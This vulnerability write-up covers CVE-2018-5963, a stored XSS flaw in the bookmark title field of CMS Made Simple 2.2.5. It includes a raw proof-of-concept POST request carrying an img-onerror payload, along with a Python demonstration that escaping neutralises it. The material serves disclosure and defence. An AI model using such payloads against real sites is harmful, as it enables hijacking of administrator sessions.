CVE-2018-5963

CMS Made Simple (CMSMS) 2.2.5 has Stored XSS in admin/addbookmark.php via the title parameter.

The Add Shortcut title field handled by admin/addbookmark.php is not properly sanitized: whatever is submitted as title is stored and later rendered into the admin interface without escaping, which gives stored XSS. The request below, sent with a valid admin session and _sk_ token, stores the title '"><img src=x onerror=alert(1)> (URL-encoded in the body). After this request, the alert pops up whenever the admin page renders the bookmark.
POST /cmsms-2.2.5-install/admin/addbookmark.php?_sk_=24c1316d9651c78528d HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Cookie: _sk_=24c1316d9651c78528d; 3e36c2b179d93f0eca459a97b9eda32a=ee958a481d387cb9a7aaddefc767cffddc9b8d8d%3A%3AYTo1OntzOjM6InVpZCI7aToxO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo3OiJlZmZfdWlkIjtOO3M6MTI6ImVmZl91c2VybmFtZSI7TjtzOjU6ImNrc3VtIjtzOjQwOiI0NGU4ZGE0MjYxYTc2MzRhMjdmMjk1OGM5NzUzMzY1OWI1NjYwMDJjIjt9; SQLiteManager_currentLangue=2; CMSICbf982e8ecf=2dca056a03f34ef10994cef9e2b38d05; CMSSESSID6cbb6f8586d9=05871ce0719e96a874da643a9b5dc368
Connection: close
Upgrade-Insecure-Requests: 1
_sk_=24c1316d9651c78528d&title=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&url=adsf&addbookmark=true
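To make the mechanism concrete, the following is an added example (not code from the write-up or from CMS Made Simple). It decodes the POST body shown above the way PHP's $_POST would, renders the stored title into a hypothetical bookmark link template both unescaped (the behaviour the CVE describes) and escaped, and runs an HTML parser over each result to show whether the payload became a real element with an event handler. The template shape and the function names are assumptions for illustration; only the request body comes from the page.

```python
"""Added example, not part of the original write-up or of CMSMS itself.

Shows why the title value from the advisory's POST body breaks out of an
HTML attribute when interpolated raw, and why escaping stops it.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# The form body exactly as shown in the write-up's request.
POST_BODY = (
    "_sk_=24c1316d9651c78528d&title=%27%22%3E%3Cimg+src%3Dx+onerror%3D"
    "alert%281%29%3E&url=adsf&addbookmark=true"
)


def parse_bookmark(body: str) -> dict:
    """Decode the form body like PHP's $_POST (one value per key)."""
    fields = parse_qs(body, keep_blank_values=True)
    return {key: values[0] for key, values in fields.items()}


def render_unescaped(title: str, url: str) -> str:
    """Hypothetical vulnerable template: raw interpolation into HTML.

    The title lands in two contexts, a quoted attribute and text.
    """
    return f'<a href="{url}" title="{title}">{title}</a>'


def render_escaped(title: str, url: str) -> str:
    """Hardened template: escape &, <, >, " and ' for both contexts.

    Equivalent to PHP htmlspecialchars($s, ENT_QUOTES) before output.
    """
    safe_title = escape(title, quote=True)
    safe_url = escape(url, quote=True)
    return f'<a href="{safe_url}" title="{safe_title}">{safe_title}</a>'


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_handlers.extend(
            name for name, _ in attrs if name.startswith("on")
        )


def injected_elements(html: str) -> dict:
    """Parse rendered HTML and report which elements/handlers exist."""
    collector = _TagCollector()
    collector.feed(html)
    collector.close()
    return {"tags": collector.tags, "event_handlers": collector.event_handlers}


if __name__ == "__main__":
    fields = parse_bookmark(POST_BODY)
    print("stored title:", fields["title"])
    for label, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        html = render(fields["title"], fields["url"])
        print(f"{label}: {html}")
        print("  parser sees:", injected_elements(html))
```

In the unescaped rendering the parser sees the a element plus two injected img elements, each carrying an onerror handler (one from the attribute context, one from the text context), which is exactly the alert the write-up describes. In the escaped rendering the same bytes survive only as attribute and text data, so the parser sees a single a element and no handlers. The payload needs both the single and double quote because the template's quoting style is unknown to the attacker; escaping with quote=True neutralises both.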
I read lots of papers and websites about this CMS. They don't give a bounty for bugs that use the admin role. So I reported it to MITRE and got CVE-2018-5963.
ref: